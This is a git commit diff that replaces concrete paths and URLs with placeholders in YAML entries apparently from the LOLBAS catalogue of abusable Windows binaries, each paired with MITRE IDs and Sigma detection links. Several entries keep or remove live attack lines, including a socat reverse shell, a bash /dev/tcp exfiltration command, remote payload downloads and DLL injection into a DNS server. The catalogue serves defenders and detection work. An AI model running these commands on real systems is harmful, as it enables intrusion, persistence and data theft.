Generalising file paths and urls, see #10 (#422)

2025-01-30 15:23:07 +01:00 · 2025-01-28 11:15:01 +00:00 · 2025-01-28 11:15:01 +00:00 · a79893e7ad
commit a79893e7ad
parent e62749f81a
196 changed files with 555 additions and 758 deletions
--- a/yml/OSBinaries/AppInstaller.yml
+++ b/yml/OSBinaries/AppInstaller.yml
@ -4,7 +4,7 @@ Description: Tool used for installation of AppX/MSIX applications on Windows 10
 Author: 'Wade Hickey'
 Created: 2020-12-02
 Commands:
-  - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
+  - Command: start ms-appinstaller://?source={REMOTEURL:.exe}
    Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
    Usecase: Download file from Internet
    Category: Download
--- a/yml/OSBinaries/At.yml
+++ b/yml/OSBinaries/At.yml
@ -4,7 +4,7 @@ Description: Schedule periodic tasks
 Author: 'Freddie Barr-Smith'
 Created: 2019-09-20
 Commands:
-  - Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
+  - Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}
    Description: Create a recurring task to execute every day at a specific time.
    Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
    Category: Execute
--- a/yml/OSBinaries/Atbroker.yml
+++ b/yml/OSBinaries/Atbroker.yml
@ -1,7 +1,7 @@
 ---
 Name: Atbroker.exe
 Description: Helper binary for Assistive Technology (AT)
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
  - Command: ATBroker.exe /start malware
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@ -1,11 +1,11 @@
 ---
 Name: Bash.exe
 Description: File used by Windows subsystem for Linux
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: bash.exe -c calc.exe
+  - Command: bash.exe -c "{CMD}"
-    Description: Executes calc.exe from bash.exe
+    Description: Executes executable from bash.exe
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
    Category: Execute
    Privileges: User
@ -14,7 +14,7 @@ Commands:
    Tags:
      - Execute: CMD
  - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
-    Description: Executes a reverseshell
+    Description: Executes a reverse shell
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
    Category: Execute
    Privileges: User
@ -22,7 +22,7 @@ Commands:
    OperatingSystem: Windows 10
    Tags:
      - Execute: CMD
-  - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
+  - Command: bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'
    Description: Exfiltrate data
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
    Category: Execute
@ -31,8 +31,8 @@ Commands:
    OperatingSystem: Windows 10
    Tags:
      - Execute: CMD
-  - Command: bash.exe -c calc.exe
+  - Command: bash.exe -c "{CMD}"
-    Description: Executes calc.exe from bash.exe
+    Description: Executes executable from bash.exe
    Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
    Category: AWL Bypass
    Privileges: User
@ -43,8 +43,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\bash.exe
  - Path: C:\Windows\SysWOW64\bash.exe
 Code_Sample:
  - Code:
 Detection:
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml
--- a/yml/OSBinaries/Bitsadmin.yml
+++ b/yml/OSBinaries/Bitsadmin.yml
@ -1,7 +1,7 @@
 ---
 Name: Bitsadmin.exe
 Description: Used for managing background intelligent transfer
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
  - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
--- a/yml/OSBinaries/Certoc.yml
+++ b/yml/OSBinaries/Certoc.yml
@ -4,7 +4,7 @@ Description: Used for installing certificates
 Author: 'Ensar Samil'
 Created: 2021-10-07
 Commands:
-  - Command: certoc.exe -LoadDLL "C:\test\calc.dll"
+  - Command: certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}
    Description: Loads the target DLL file
    Usecase: Execute code within DLL file
    Category: Execute
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows Server 2022
    Tags:
      - Execute: DLL
-  - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
+  - Command: certoc.exe -GetCACAPS {REMOTEURL:.ps1}
    Description: Downloads text formatted files
    Usecase: Download scripts, webshells etc.
    Category: Download
--- a/yml/OSBinaries/Certreq.yml
+++ b/yml/OSBinaries/Certreq.yml
@ -1,18 +1,18 @@
 ---
 Name: CertReq.exe
 Description: Used for requesting and managing certificates
-Author: 'David Middlehurst'
+Author: David Middlehurst
 Created: 2020-07-07
 Commands:
-  - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
+  - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}
-    Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
+    Description: Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).
    Usecase: Download file from Internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
-  - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini
+  - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}
-    Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal
+    Description: Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.
    Usecase: Upload
    Category: Upload
    Privileges: User
@ -21,8 +21,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\certreq.exe
  - Path: C:\Windows\SysWOW64\certreq.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml
  - IOC: certreq creates new files
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@ -1,46 +1,46 @@
 ---
 Name: Certutil.exe
 Description: Windows binary used for handling certificates
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
+  - Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}
-    Description: Download and save 7zip to disk in the current folder.
+    Description: Download and save executable to disk in the current folder.
    Usecase: Download file from Internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
+  - Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}
-    Description: Download and save 7zip to disk in the current folder.
+    Description: Download and save executable to disk in the current folder.
    Usecase: Download file from Internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
+  - Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
    Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
    Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil -encode inputFileName encodedOutputFileName
+  - Command: certutil -encode {PATH} {PATH:.base64}
    Description: Command to encode a file using Base64
    Usecase: Encode files to evade defensive measures
    Category: Encode
    Privileges: User
    MitreID: T1027.013
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil -decode encodedInputFileName decodedOutputFileName
+  - Command: certutil -decode {PATH:.base64} {PATH}
    Description: Command to decode a Base64 encoded file.
    Usecase: Decode files to evade defensive measures
    Category: Decode
    Privileges: User
    MitreID: T1140
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
+  - Command: certutil -decodehex {PATH:.hex} {PATH}
-    Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
+    Description: Command to decode a hexadecimal-encoded file.
    Usecase: Decode files to evade defensive measures
    Category: Decode
    Privileges: User
@ -49,8 +49,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\certutil.exe
  - Path: C:\Windows\SysWOW64\certutil.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml
--- a/yml/OSBinaries/Cmd.yml
+++ b/yml/OSBinaries/Cmd.yml
@ -4,28 +4,28 @@ Description: The command-line interpreter in Windows
 Author: Ye Yint Min Thu Htut
 Created: 2019-06-26
 Commands:
-  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
+  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat
    Description: Add content to an Alternate Data Stream (ADS).
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: cmd.exe - < fakefile.doc:payload.bat
+  - Command: cmd.exe - < {PATH}:payload.bat
    Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: ADS
    Privileges: User
    MitreID: T1059.003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: type \\webdav-server\folder\file.ext > C:\Path\file.ext
+  - Command: type {PATH_SMB} > {PATH_ABSOLUTE}
    Description: Downloads a specified file from a WebDAV server to the target file.
    Usecase: Download/copy a file from a WebDAV server
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: type C:\Path\file.ext > \\webdav-server\folder\file.ext
+  - Command: type {PATH_ABSOLUTE} > {PATH_SMB}
    Description: Uploads a specified file to a WebDAV server.
    Usecase: Upload a file to a WebDAV server
    Category: Upload
--- a/yml/OSBinaries/Cmdkey.yml
+++ b/yml/OSBinaries/Cmdkey.yml
@ -1,7 +1,7 @@
 ---
 Name: Cmdkey.exe
 Description: creates, lists, and deletes stored user names and passwords or credentials.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
  - Command: cmdkey /list
--- a/yml/OSBinaries/Cmdl32.yml
+++ b/yml/OSBinaries/Cmdl32.yml
@ -1,7 +1,7 @@
 ---
 Name: cmdl32.exe
 Description: Microsoft Connection Manager Auto-Download
-Author: 'Elliot Killick'
+Author: Elliot Killick
 Created: 2021-08-26
 Commands:
  - Command: cmdl32 /vpn /lan %cd%\config
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@ -1,10 +1,10 @@
 ---
 Name: Cmstp.exe
 Description: Installs or removes a Connection Manager service profile.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
+  - Command: cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}
    Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
    Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
    Category: Execute
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: INF
-  - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
+  - Command: cmstp.exe /ni /s {REMOTEURL:.inf}
    Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
    Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
    Category: AWL Bypass
--- a/yml/OSBinaries/Colorcpl.yml
+++ b/yml/OSBinaries/Colorcpl.yml
@ -1,10 +1,10 @@
 ---
 Name: Colorcpl.exe
 Description: Binary that handles color management
-Author: 'Arjan Onwezen'
+Author: Arjan Onwezen
 Created: 2023-06-26
 Commands:
-  - Command: colorcpl file.txt
+  - Command: colorcpl {PATH}
    Description: Copies the referenced file to C:\Windows\System32\spool\drivers\color\.
    Usecase: Copies file(s) to a subfolder of a generally trusted folder (c:\Windows\System32), which can be used to hide files or make them blend into the environment.
    Category: Copy
--- a/yml/OSBinaries/ConfigSecurityPolicy.yml
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
@ -1,17 +1,17 @@
 ---
 Name: ConfigSecurityPolicy.exe
-Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
+Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
 Author: Ialle Teixeira
 Created: 2020-09-04
 Commands:
-  - Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
+  - Command: ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}
    Description: Upload file, credentials or data exfiltration in general
    Usecase: Upload file
    Category: Upload
    Privileges: User
    MitreID: T1567
    OperatingSystem: Windows 10
-  - Command: ConfigSecurityPolicy.exe https://example.com/payload
+  - Command: ConfigSecurityPolicy.exe {REMOTEURL}
    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
    Category: Download
@ -23,8 +23,6 @@ Commands:
 Full_Path:
  - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml
  - IOC: ConfigSecurityPolicy storing data into alternate data streams.
--- a/yml/OSBinaries/Conhost.yml
+++ b/yml/OSBinaries/Conhost.yml
@ -4,8 +4,8 @@ Description: Console Window host
 Author: Wietze Beukema
 Created: 2022-04-05
 Commands:
-  - Command: "conhost.exe calc.exe"
+  - Command: conhost.exe {CMD}
-    Description: Execute calc.exe with conhost.exe as parent process
+    Description: Execute a command line with conhost.exe as parent process
    Usecase: Use conhost.exe as a proxy binary to evade defensive counter-measures
    Category: Execute
    Privileges: User
@ -13,8 +13,8 @@ Commands:
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
-  - Command: "conhost.exe --headless calc.exe"
+  - Command: conhost.exe --headless {CMD}
-    Description: Execute calc.exe with conhost.exe as parent process
+    Description: Execute a command line with conhost.exe as parent process
    Usecase: Specify --headless parameter to hide child process window (if applicable)
    Category: Execute
    Privileges: User
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
@ -1,10 +1,10 @@
 ---
 Name: Control.exe
 Description: Binary used to launch controlpanel items in Windows
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: control.exe c:\windows\tasks\file.txt:evil.dll
+  - Command: control.exe {PATH_ABSOLUTE}:evil.dll
    Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: ADS
@ -13,8 +13,8 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
-  - Command: control.exe c:\windows\tasks\evil.cpl
+  - Command: control.exe {PATH_ABSOLUTE:.cpl}
-    Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
+    Description: Execute .cpl file. A CPL is a DLL file with CPlApplet export function)
    Usecase: Use to execute code and bypass application whitelisting
    Category: Execute
    Privileges: User
--- a/yml/OSBinaries/Csc.yml
+++ b/yml/OSBinaries/Csc.yml
@ -1,18 +1,18 @@
 ---
 Name: Csc.exe
 Description: Binary file used by .NET Framework to compile C# code
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: csc.exe -out:Output.exe File.cs
+  - Command: csc.exe -out:{PATH:.exe} {PATH:.cs}
-    Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe.
+    Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to the specified .exe path.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: csc -target:library File.cs
+  - Command: csc -target:library {PATH:.cs}
-    Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file.
+    Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to a DLL file with the same name.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
@ -25,8 +25,6 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@ -1,10 +1,10 @@
 ---
 Name: Cscript.exe
 Description: Binary used to execute scripts in Windows
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: cscript //e:vbscript c:\ads\file.txt:script.vbs
+  - Command: cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs
    Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: ADS
--- a/yml/OSBinaries/CustomShellHost.yml
+++ b/yml/OSBinaries/CustomShellHost.yml
@ -1,7 +1,7 @@
 ---
 Name: CustomShellHost.exe
 Description: A host process that is used by custom shells when using Windows in Kiosk mode.
-Author: 'Wietze Beukema'
+Author: Wietze Beukema
 Created: 2021-11-14
 Commands:
  - Command: CustomShellHost.exe
--- a/yml/OSBinaries/DataSvcUtil.yml
+++ b/yml/OSBinaries/DataSvcUtil.yml
@ -1,10 +1,10 @@
 ---
 Name: DataSvcUtil.exe
 Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
-Author: 'Ialle Teixeira'
+Author: Ialle Teixeira
 Created: 2020-12-01
 Commands:
-  - Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
+  - Command: DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL}
    Description: Upload file, credentials or data exfiltration in general
    Usecase: Upload file
    Category: Upload
--- a/yml/OSBinaries/Desktopimgdownldr.yml
+++ b/yml/OSBinaries/Desktopimgdownldr.yml
@ -4,7 +4,7 @@ Description: Windows binary used to configure lockscreen/desktop image
 Author: Gal Kristal
 Created: 2020-06-28
 Commands:
-  - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
+  - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr
    Description: Downloads the file and sets it as the computer's lockscreen
    Usecase: Download arbitrary files from a web server
    Category: Download
@ -13,8 +13,6 @@ Commands:
    OperatingSystem: Windows 10, Windows 11
 Full_Path:
  - Path: c:\windows\system32\desktopimgdownldr.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml
--- a/yml/OSBinaries/DeviceCredentialDeployment.yml
+++ b/yml/OSBinaries/DeviceCredentialDeployment.yml
@ -1,8 +1,8 @@
 ---
 Name: DeviceCredentialDeployment.exe
 Description: Device Credential Deployment
-Author: 'Elliot Killick'
+Author: Elliot Killick
-Created: '2021-08-16'
+Created: 2021-08-16
 Commands:
  - Command: DeviceCredentialDeployment
    Description: Grab the console window handle and set it to hidden
--- a/yml/OSBinaries/Dfsvc.yml
+++ b/yml/OSBinaries/Dfsvc.yml
@ -1,10 +1,10 @@
 ---
 Name: Dfsvc.exe
 Description: ClickOnce engine in Windows used by .NET
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
+  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}
    Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
    Usecase: Use binary to bypass Application whitelisting
    Category: AWL Bypass
@ -19,8 +19,6 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
 Resources:
--- a/yml/OSBinaries/Diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@ -4,8 +4,8 @@ Description: Binary that package existing files into a cabinet (.cab) file
 Author: Tamir Yehuda
 Created: 2020-08-08
 Commands:
-  - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
+  - Command: diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab
-    Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
+    Description: Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
    Usecase: Hide data compressed into an Alternate Data Stream.
    Category: ADS
    Privileges: User
@ -13,8 +13,8 @@ Commands:
    OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
    Tags:
      - Type: Compression
-  - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
+  - Command: diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}
-    Description: Download and compress a remote file and store it in a cab file on local machine.
+    Description: Download and compress a remote file and store it in a CAB file on local machine.
    Usecase: Download and compress into a cab file.
    Category: Download
    Privileges: User
@ -22,7 +22,7 @@ Commands:
    OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
    Tags:
      - Type: Compression
-  - Command: diantz /f directives.ddf
+  - Command: diantz /f {PATH:.ddf}
    Description: Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.
    Usecase: Bypass command-line based detections
    Category: Execute
@ -34,8 +34,6 @@ Commands:
 Full_Path:
  - Path: c:\windows\system32\diantz.exe
  - Path: c:\windows\syswow64\diantz.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml
--- a/yml/OSBinaries/Diskshadow.yml
+++ b/yml/OSBinaries/Diskshadow.yml
@ -1,10 +1,10 @@
 ---
 Name: Diskshadow.exe
 Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: diskshadow.exe /s c:\test\diskshadow.txt
+  - Command: diskshadow.exe /s {PATH:.txt}
    Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
    Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit
    Category: Dump
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows server
    Tags:
      - Execute: CMD
-  - Command: diskshadow> exec calc.exe
+  - Command: diskshadow> exec {PATH:.exe}
    Description: Execute commands using diskshadow.exe to spawn child process
    Usecase: Use diskshadow to bypass defensive counter measures
    Category: Execute
@ -25,8 +25,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\diskshadow.exe
  - Path: C:\Windows\SysWOW64\diskshadow.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml
--- a/yml/OSBinaries/Dnscmd.yml
+++ b/yml/OSBinaries/Dnscmd.yml
@ -1,10 +1,10 @@
 ---
 Name: Dnscmd.exe
 Description: A command-line interface for managing DNS servers
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
+  - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll}
    Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
    Usecase: Remotely inject dll to dns server
    Category: Execute
@ -28,7 +28,6 @@ Resources:
  - Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
 Acknowledgement:
  - Person: Shay Ber
    Handle:
  - Person: Dimitrios Slamaris
    Handle: '@dim0x69'
  - Person: Nikhil SamratAshok
--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@ -1,45 +1,45 @@
 ---
 Name: Esentutl.exe
 Description: Binary for working with Microsoft Joint Engine Technology (JET) database
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
+  - Command: esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o
    Description: Copies the source VBS file to the destination VBS file.
    Usecase: Copies files from A to B
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
+  - Command: esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o
